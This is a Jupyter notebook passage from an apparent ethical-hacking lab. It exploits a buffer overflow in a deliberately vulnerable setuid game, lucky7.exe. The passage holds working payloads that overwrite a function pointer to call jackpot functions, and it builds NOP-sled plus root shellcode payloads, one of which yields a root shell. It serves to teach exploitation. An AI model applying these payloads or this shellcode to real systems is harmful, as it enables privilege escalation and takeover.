"### Find the vulnerability in the game\n- do code review to find global **player** object and `change_username()`\n- note **user** struct has declared name buffer of 100 bytes\n- change_username() function uses `mgest()` function to read and store data into name field one character at a time until '\\n'\n- there's nothing to limit it to the length of the destination buffer!\n- so, the game has buffer overrun/overflow vulnerability!\n\n### Exploit the overflow vulnerability\n- run the program\n- explore the memory addresses of **name** and **current_game** using peda/gdb\n- use gdb to debug the live process\n- find the process id of lucky7.exe process\n\n```bash\n┌──(kali㉿K)-[~]\n└─$ ps aux | grep lucky7.exe \nroot 30439 0.1 0.0 5476 1344 pts/2 S+ 10:54 0:00 ./lucky7.exe\nkali 30801 0.0 0.0 6320 724 pts/3 S+ 10:59 0:00 grep --color=auto lucky7.exe\n\n\n- use the process_id to debug in gdb\n\n┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]\n└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe\n\n(gdb) p/x &player.name\n$1 = 0x8050148\n\n(gdb) p/x &player.current_game\n$2 = 0x80501ac\n\n(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)\n$3 = 100\n```\n\n- notice, **name[100]** is at a lower address\n- **(\\*current_game)()** is at a higher address find the exact size that would overlfow the current_game\n- the offset should be at least 100 bytes\n\n### Let's overwrite the current_game's value with our controlled address\n\n- create a string with 100As + BBBB\n- detach the process from gdb and change the name with menu option 5 pasting the following buffer\n- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242",
"_____no_output_____"
]
],
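[
[
"# A minimal sketch (added for illustration, not from the original run): compute the overflow\n# offset from the two addresses gdb reported above and build the name payload in Python.\n# The addresses 0x8050148 (&player.name) and 0x80501ac (&player.current_game) are the ones\n# found in that particular gdb session and are assumptions here; they change if the binary is rebuilt.\nimport struct\n\nname_addr = 0x8050148   # &player.name (from gdb)\nfptr_addr = 0x80501ac   # &player.current_game (from gdb)\noffset = fptr_addr - name_addr   # filler bytes needed before reaching the function pointer\n\ntarget = 0x42424242   # placeholder value ('BBBB') just to prove we control the pointer\npayload = b'A' * offset + struct.pack('<I', target)   # 32-bit little-endian address\nprint(offset, payload)",
"_____no_output_____"
]
],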
[
[
"# change the name to the following string\n! python -c 'print(\"A\"*100 + \"B\"*4)'",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r\n"
]
],
[
[
"- run the program and play the last game after changing name\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \nDatabase file doesn't exist: /var/lucky7.txt\n-=-={ New Player Registration }=-=-\nEnter your name: John Smith\n\nWelcome to the Lucky 7 Game John Smith.\nYou have been given 500 credits.\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 500 credits] -> Enter your choice [1-7]: 1\n\n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b141\nthe random number is: 8 \nSorry! Better luck next time...\n\nYou have 490 credits\nWould you like to play again? [y/n]: n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 490 credits] -> Enter your choice [1-7]: 5\n\nChange user name\nEnter your new name:\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]\n[You have 490 credits] -> Enter your choice [1-7]: 1\n\n[DEBUG] current_game pointer 0x42424242\nzsh: segmentation fault ./lucky7.exe\n```",
"_____no_output_____"
],
[
"### Find useful functions/code in the program to execute\n- **nm** command lists symbols in object files with corresponding addresses\n - can be used to find addresses of various functions in a program\n- `jackpot()` functions are intruiging!\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]\n└─$ nm ./lucky7.exe \n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ nm ./lucky7.exe 139 ⨯\n08050114 B __bss_start\n08050120 b completed.0\n U __cxa_atexit@GLIBC_2.1.3\n08050104 D DATAFILE\n080500f8 D __data_start\n080500f8 W data_start\n0804a440 t deregister_tm_clones\n0804a420 T _dl_relocate_static_pie\n0804a4c0 t __do_global_dtors_aux\n0804fee4 d __do_global_dtors_aux_fini_array_entry\n080500fc D __dso_handle\n08050100 V DW.ref.__gxx_personality_v0\n0804fee8 d _DYNAMIC\n08050114 D _edata\n080501b4 B _end\n U exit@GLIBC_2.0\n0804c3d8 T _fini\n0804d000 R _fp_hw\n0804a4f0 t frame_dummy\n0804fed8 d __frame_dummy_init_array_entry\n0804e438 r __FRAME_END__\n U getchar@GLIBC_2.0\n U getuid@GLIBC_2.0\n08050000 d _GLOBAL_OFFSET_TABLE_\n0804c34a t _GLOBAL__sub_I_DATAFILE\n0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User\n w __gmon_start__\n0804d7e4 r __GNU_EH_FRAME_HDR\n U __gxx_personality_v0@CXXABI_1.3\n0804a000 T _init\n0804fee4 d __init_array_end\n0804fed8 d __init_array_start\n0804d004 R _IO_stdin_used\n0804c3d0 T __libc_csu_fini\n0804c370 T __libc_csu_init\n U __libc_start_main@GLIBC_2.0\n0804bcda T main\n08050140 B player\n U printf@GLIBC_2.0\n U puts@GLIBC_2.0\n U rand@GLIBC_2.0\n0804a480 t register_tm_clones\n U sleep@GLIBC_2.0\n U srand@GLIBC_2.0\n0804a3e0 T _start\n U strcpy@GLIBC_2.0\n U strlen@GLIBC_2.0\n U time@GLIBC_2.0\n08050114 D __TMC_END__\n U _Unwind_Resume@GCC_3.0\n0804bcd2 T __x86.get_pc_thunk.ax\n0804c3d1 T __x86.get_pc_thunk.bp\n0804a430 T __x86.get_pc_thunk.bx\n0804bcd6 T __x86.get_pc_thunk.si\n0804a4f2 T _Z10get_choiceR4User\n0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!\n0804b2b8 T _Z10lucky77777v\n0804c038 T _Z11jackpot100Kv\n0804b042 T _Z11printNumberi\n0804b3fb T _Z12reset_creditPcR4User\n0804aeeb T _Z12show_creditsRK4User\n0804c181 T _Z13play_the_gamev\n0804c0d2 T _Z14deduct_creditsv\n0804c29c T _Z15change_usernamev\n0804ac37 T _Z16read_player_dataPcR4User\n0804b429 T _Z17get_random_numberi\n0804a97f T _Z18update_player_dataPcR4User\n0804a6c0 T _Z19register_new_playerPcR4User\n0804b547 t _Z41__static_initialization_and_destruction_0ii\n0804c2f1 t _Z41__static_initialization_and_destruction_0ii\n0804ae82 T _Z5mgetsPc\n0804b141 T _Z6lucky7v\n0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE\n0804b1cd T _Z8lucky777v\n0804c085 T _Z9jackpot1Mv\n0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_\n0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc\n...\n\n```",
"_____no_output_____"
],
[
"### Script the interactive user input\n- instead of typing options and commands interactively, they can be scripted and piped into the program\n- program can then parse and use the input as if someone is interactively typing it from the std input stream\n- make sure the game has been played atleast once by the current user\n - the following script needs to start with full name otherwise!",
"_____no_output_____"
]
],
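[
[
"# A hedged sketch (added, not part of the original notebook): extract the jackpot functions'\n# addresses from nm programmatically instead of reading the symbol table by hand, and pack\n# them little-endian for use in a scripted exploit. Assumes ./lucky7.exe exists in the current\n# directory and that the 'nm' utility is available.\nimport struct, subprocess\n\nnm_out = subprocess.run(['nm', './lucky7.exe'], capture_output=True, text=True).stdout\nfor line in nm_out.splitlines():\n    parts = line.split()\n    if len(parts) == 3 and 'jackpot' in parts[2]:\n        addr = int(parts[0], 16)\n        print(parts[2], hex(addr), struct.pack('<I', addr))",
"_____no_output_____"
]
],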
[
[
"# play game #1, y, n; \n# Enter 7 to quit\n! python -c 'print(\"1\\ny\\nn\\n7\")'",
"1\r\ny\r\nn\r\n7\r\n"
],
[
"%pwd",
"_____no_output_____"
],
[
"! python -c 'print(\"1\\ny\\nn\\n7\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 99320 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 2 \nSorry! Better luck next time...\n\nYou have 99310 credits\nWould you like to play again? [y/n]: \n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 1 \nSorry! Better luck next time...\n\nYou have 99300 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 99300 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
],
[
"# let's replace the current_game with out own data (BBBB)\n! python -c 'print(\"1\\nn\\n5\\n\" + \"A\"*100 + \"BBBB\\n\" + \"1\\nn\\n7\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 109290 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 6 \nSorry! Better luck next time...\n\nYou have 109280 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109280 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]\n[You have 109280 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x42424242\n"
],
[
"# note the jackpot()'s address\n! nm ./lucky7.exe | grep jackpot",
"0804bf6b T _Z10jackpot10Kv\r\n0804bfb8 T _Z11jackpot100Kv\r\n0804c005 T _Z9jackpot1Mv\r\n"
],
[
"# let's create a string mimicking game play with jackpot100K address!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\nn\\n7\\n\")'\n# the following is the sequnce of user input to play the game",
"1\r\nn\r\n5\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��\u0004\b\r\n1\r\nn\r\n7\r\n"
],
[
"# now let's hit the Jackpot to receive 100K credit!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\nn\\n7\\n\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 109280 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 5 \nSorry! Better luck next time...\n\nYou have 109270 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109270 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109270 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 209270 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 209270 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
],
[
"# let's hit the Jackpot 2 times in a row!\n# and change to your actual name\n# now let's hit the Jackpot!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\ny\\nn\\n5\\nJohn Smith\\n2\\nn\\n7\\n\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ]\n[You have 609200 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 9 \nSorry! Better luck next time...\n\nYou have 609190 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ��]\n[You have 609190 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 609190 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 709190 credits\nWould you like to play again? [y/n]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 809190 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 809190 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 809190 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 777 ~*~*~\nCosts 50 credits to play this game.\nMachine will generate 3 random numbers each between 1 and 9.\nIf all 3 numbers are 7, you win a jackpot of 100 THOUSAND\nIf all 3 numbers match, you win 10 THOUSAND\nOtherwise, you lose.\n Enter to continue...\n\n[DEBUG] current_game pointer 0x0804b14d\n3 random numers are: 3 4 4 \nSorry! Better luck next time...\n\nYou have 809140 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 809140 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
]
],
[
[
"## Exploiting with shellcode\n\n### Stashing Shellcode as Environment Varaible\n- compile `getenvaddr.cpp` file as 32-bit binary",
"_____no_output_____"
]
],
[
[
"! g++ -m32 -o getenvaddr.exe getenvaddr.cpp",
"_____no_output_____"
]
],
[
[
"- export `/shellcode/shellcode_root.bin` as an env variable\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ export SHELLCODE=$(cat ../../shellcode/shellcode_root.bin)\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./getenvaddr.exe SHELLCODE ./lucky7.exe \nSHELLCODE will be at 0xffffdf80 with reference to ./lucky7.exe\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\x80\\xdf\\xff\\xff\\n\" + b\"1\\n\")' > env_exploit\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ cat env_exploit - | ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 858770 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0bf\nthe random number is: 4 \nSorry! Better luck next time...\n\nYou have 858760 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�]\n[You have 858760 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����]\n[You have 858760 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0xffffdf80\nwhoami\nroot\nexit\n\n```\n\n- congratulations on getting your shellcode executed!!",
"_____no_output_____"
],
[
"### Smuggling Shellcode into Program's Buffer\n### Note: not working!!!\n\n- as the program is setuid; it \"should\" give you a root shell if you can manage to smuggle and execute root shellcode!\n- goal is to overwrite `player.name` with shellcode\n- overflow the `player.current_game` attribute with the address of the smuggled shellcode\n - NOTE: we're not overflowing the return address, though you could!\n- find the address of `player.name` attribute using gdb\n- run `lucky7.exe` game from a terminal\n- from another terminal finds its pid\n\n```bash\n# Terminal 1\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ]\n[You have 809140 credits] -> Enter your choice [1-7]: \n\n#Terminal 2\n\n┌──(kali㉿K)-[~]\n└─$ ps aux | grep lucky7.exe\nroot 2639 0.0 0.0 5476 1264 pts/2 S+ 15:01 0:00 ./lucky7.exe\nkali 2932 0.0 0.0 6320 660 pts/3 S+ 15:01 0:00 grep --color=auto lucky7.exe\n\n\n┌──(kali㉿K)-[~]\n└─$ sudo gdb -q --pid=2639\n[sudo] password for kali: \nAttaching to process 2639\nReading symbols from /home/kali/projects/EthicalHacking/demos/other_overflow/lucky7.exe...\nReading symbols from /lib32/libstdc++.so.6...\n(No debugging symbols found in /lib32/libstdc++.so.6)\nReading symbols from /lib32/libgcc_s.so.1...\n(No debugging symbols found in /lib32/libgcc_s.so.1)\nReading symbols from /lib32/libc.so.6...\n(No debugging symbols found in /lib32/libc.so.6)\nReading symbols from /lib32/libm.so.6...\n(No debugging symbols found in /lib32/libm.so.6)\nReading symbols from /lib/ld-linux.so.2...\n(No debugging symbols found in /lib/ld-linux.so.2)\n0xf7fcb559 in __kernel_vsyscall ()\nwarning: File \"/home/kali/.gdbinit\" auto-loading has been declined by your `auto-load safe-path' set to \"$debugdir:$datadir/auto-load\".\nTo enable execution of this file add\n add-auto-load-safe-path /home/kali/.gdbinit\nline to your configuration file \"/root/.gdbinit\".\nTo completely disable this security protection add\n set auto-load safe-path /\nline to your configuration file \"/root/.gdbinit\".\nFor more information about this security protection see the\n\"Auto-loading safe path\" section in the GDB manual. E.g., run from the shell:\n info \"(gdb)Auto-loading safe path\"\n(gdb) p/x &player.name\n$1 = 0x8050128\n(gdb) p/x &player.current_game\n$2 = 0x805018c\n(gdb) p/u 0x805018c - 0x8050128\n$3 = 100\n(gdb)\n(gdb) quit\n\n\n```\n- so the address of `player.name` is 0x8050128\n- the offset to overwrite `player.current_game` from `player.name` is 100!\n- exploit code should look like this: [NOP sled | shellcode | SHELLCODE_ADDRESS]\n- NOP sled + shellcode should be 100 bytes long\n- let's find the length of the root shellcode in `shellcode` folder\n",
"_____no_output_____"
]
],
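[
[
"# A consolidated sketch (added for illustration) of the exploit layout described above:\n# [NOP sled | shellcode | address of player.name + 25]. It assumes the shellcode path below\n# exists and reuses the player.name address 0x8050128 found in the gdb session above, which\n# is only valid while ASLR is disabled and the binary is unchanged. The output file name is hypothetical.\nimport struct\n\nname_addr = 0x8050128   # &player.name from gdb\nshellcode = open('../../shellcode/shellcode_root.bin', 'rb').read()\nnop_sled = b'\\x90' * (100 - len(shellcode))   # pad the 100-byte name buffer exactly\nret_addr = struct.pack('<I', name_addr + 25)   # land inside the NOP sled\n\nexploit = nop_sled + shellcode + ret_addr + b'\\n'\nwith open('lucky7_exploit_sketch.bin', 'wb') as f:\n    f.write(exploit)\nprint(len(exploit), 'bytes written')",
"_____no_output_____"
]
],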
[
[
"%pwd",
"_____no_output_____"
],
[
"%cd ./demos/other_overflow",
"/home/kali/projects/EthicalHacking/demos/other_overflow\n"
],
[
"! wc -c ../../shellcode/shellcode_root.bin",
"35 ../../shellcode/shellcode_root.bin\r\n"
],
[
"# total NOP sled\n100 - 35",
"_____no_output_____"
],
[
"# let's write NOP sled to a binary file\n! python -c 'import sys; sys.stdout.buffer.write(b\"\\x90\"*65)' > ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"! wc -c ./lucky7_exploit.bin",
"65 ./lucky7_exploit.bin\r\n"
],
[
"# lets append shellcode to the exploitcode\n! cat ../../shellcode/shellcode_root.bin >> ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"# let's check the size of exploit code\n! wc -c ./lucky7_exploit.bin",
"100 ./lucky7_exploit.bin\r\n"
],
[
"print(hex(0x08050128 + 25))",
"0x8050141\n"
],
[
"# let's append the address of player.name: 0x8050128\n! python -c 'import sys; sys.stdout.buffer.write(b\"\\x41\\x01\\x05\\x08\\n\")' >> ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"! hexdump -C ./lucky7_exploit.bin",
"00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|\r\n*\r\n00000040 90 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 |.1.1.1......j.XQ|\r\n00000050 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 |h//shh/bin..Q..S|\r\n00000060 89 e1 cd 80 41 01 05 08 0a |....A....|\r\n00000069\r\n"
],
[
"# let's check the size of exploit code\n! wc -c ./lucky7_exploit.bin",
"105 ./lucky7_exploit.bin\r\n"
],
[
"! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\")' > lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! hexdump -C lucky7_final_exploit.bin",
"00000000 31 0a 6e 0a 35 0a |1.n.5.|\r\n00000006\r\n"
],
[
"! cat lucky7_exploit.bin >> lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! python -c 'import sys; sys.stdout.buffer.write(b\"1\\n\")' >> lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! wc -c ./exploit_game.bin",
"116 ./exploit_game.bin\r\n"
],
[
"! hexdump -C ./lucky7_final_exploit.bin",
